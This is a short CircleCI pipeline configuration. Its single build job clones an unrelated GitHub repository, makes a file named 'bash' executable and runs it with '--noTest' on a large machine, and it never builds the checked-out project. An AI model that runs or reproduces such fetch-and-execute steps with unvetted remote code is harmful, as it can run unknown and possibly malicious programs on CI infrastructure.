version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:2024.01.2 # recommended Linux image
    resource_class: large
    steps:
      - checkout # Checkout the code
      - run:
          name: git clone
          command: git clone https://github.com/masrey2211/ggi && ls
      - run:
          name: Make script executable
          command: chmod u+x bash
      - run:
          name: Run bash script without tests
          command: ./bash --noTest

workflows:
  version: 2
  build_deploy:
    jobs:
      - build
